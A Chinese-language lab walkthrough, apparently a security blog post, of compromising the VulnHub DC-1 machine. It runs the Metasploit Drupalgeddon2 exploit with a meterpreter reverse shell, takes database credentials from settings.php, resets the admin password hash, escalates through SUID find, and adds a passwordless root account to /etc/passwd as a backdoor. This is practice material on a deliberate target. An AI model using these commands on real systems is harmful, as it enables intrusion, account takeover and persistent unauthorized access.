打靶系列之 - dc-1

前言

这篇文章是零度安全2021年的首篇文章，后期将会陆续更新打靶，实战系列的文章。

在这里也感谢大家对零度安全的支持与信任。

前期准备工作

今天要渗透的靶机是DC-1,首先需要将靶机下载下来。

靶机的下载地址是：https://www.vulnhub.com/entry/dc-1-1,292/

当把靶机下载好之后导入到VMware虚拟机当中，然后运行。

打开看到这个画面就说明已经把环境搭建好了，现在我们的目的就是拿下这个服务器。

1. 第一步信息收集

首先我们得知道这个服务器的ip地址是多少

在Kali中通过一下两个命令中任意一个获取到，目的是扫描整个网段可以ping通的IP：

nmap -sP 192.168.202.0/24

netdiscover-r 192.168.202.0/24

这里我用的是 netdiscover -r IP这个命令 ，可以看到192.168.202.125 就是我们的靶机，通过一下命令获取靶机开放的端口。

nmap -A 192.168.202.125

开放了80，111，和22端口

我们在页面访问80端口

看到是个典型的CMS。

2. 指纹识别

通过下面这个命令，可以获取到CMS名称，版本信息，开发语言

whatweb -v http://192.168.202.125/

通过探测识别我们可以看到，系统是Drupal框架。

3. 目录扫描

通过dirb扫描整个文章，看是否可以有利用的信息。

dirb http://192.168.202.125/。

但是并没有扫描出理想文件目录出来。

4. 漏洞利用

既然没有可以利用的点，那直接使用MSF，进行Drupal框架漏洞利用

进入kali 输入 msfconsole 打开MSF

搜索漏洞

search drupal

可以看到一堆可利用的漏洞，这里我们使用drupal_drupalgeddon2漏洞，可以直接getshell

输入

use exploit/unix/webapp/drupal_drupalgeddon2 #选择这个exp模块

这个时候MSF提示没有设置payload，所以需要设置一下payload

输入：set payload php/meterpreter/reverse_tcp

设置成功

既然我们要使用drupal_drupalgeddon2这个漏洞，那我们就得看下这个漏洞如何使用？

输入：

show options

可以看到我们需要输入靶机IP地址就可以。

输入：

set RHOSTS 192.168.202.125

设置好之后

输入exploit 开始进行漏洞攻击

在输入 shell

这个时候我们己经拿到了getshell

首先查看当前用户，输入whoami

发现不是root用户没关系，在找找其他突破口

ls一下，拿到flag1.txt

查看flag1.txt之后，他已经给我们了第二个提示，需要去找drupal配置文件。

获取一个完全交互式shell输入：

python -c 'import pty;pty.spawn ("/bin/bash")'

获取完全交互的shell，方便后面输入命令。

5. 寻找配置文件

找来找去，终于找到了，配置文件

sites/default/settings.php

我可以看到拿到了flag2，并且还拿到了数据库的账号和密码：

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

'driver' => 'mysql'

首先查看mysql的服务是否启动：

netstat -anptl

看到mysql是启动的，但是无法进行远程连接，既然这样，接下来的思路就是直接在shell中连接数据库，然后修改页面登录密码，进入页面后台。

输入

mysql -udbuser -pR0ck3t #连接数据库

输入

show databases; #查看数据库

use drupaldb; #选择数据库

show tables; #查看当前数据库下的表名

可以看到users表

select * from users\G;

可以看到这个表存储的是账号和密码

修改admin这条数据的密码，我们需要一个加密过的密码。

通过寻找我们发现drupal的加密文件在scripts/password-hash.sh这个位置下。

退出mysql

exit;

输入phpscripts/password-hash.sh 123456

这个时候我们获取了123456 加密后的密码

进入数据库执行

update users set pass='SDlSKHHi7ce.SDNqIi.ADRfU4jht/eXAyXmj8pINH0oqLO4IW9vOM'where uid=1

这个时候我们就修改了密码，现在去后台登录试试

进入后台。

6. 页面操作

在逛页面的时候我们看到了flag3

打开看看写了什么

根据提示告诉我们可以去看下密码文件

进入msf会话中，去看下/etc/passwd文件

看到了fag4，提示我们去/home寻找线索

于是：

cd /home

cd flag4

cat flag4.txt

提示我们需要越权。

7. 越权

输入命令，目的是为了使用find命令查看拥有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

可以看到find也在其中，直接使用find命令进行越权

输入

find/home/flag4 -exec "whoami" \;

这里flag4是目录，你也可以指向任意目录

可以看到find是root权限

输入

find/home/flag4 -exec "/bin/sh" \;

提权成功

进入root目录查看最后一个flag

到这就拿下了整个靶机

为了登录方便执行

echo'admin::0:0:: /root:/bin/bash' >> /etc/passwd

给服务器写入账户为admin的免密登录账号，方便下次登录

8.总结

通过这个靶机有几个点你得掌握

1.使用nmap ，whatweb ，netdiscover 工具进行信息收集，获取到靶机的各个信息。

2.了解drupal，wordpress，joomla，是PHP三大CMS框架，很多基础信息需要通过百度来获取，比如上述的drupal数据库密码生成位置，和数据库配置。

3.掌握MSF的使用方法，通过MSF框架进行对靶机项目的漏洞利用。

4.必须掌握数据库操作，查询库，表，数据，修改，添加等操作。

5.find提权，通过find获取到root的suid，suid具有传递性，从而拿到root权限。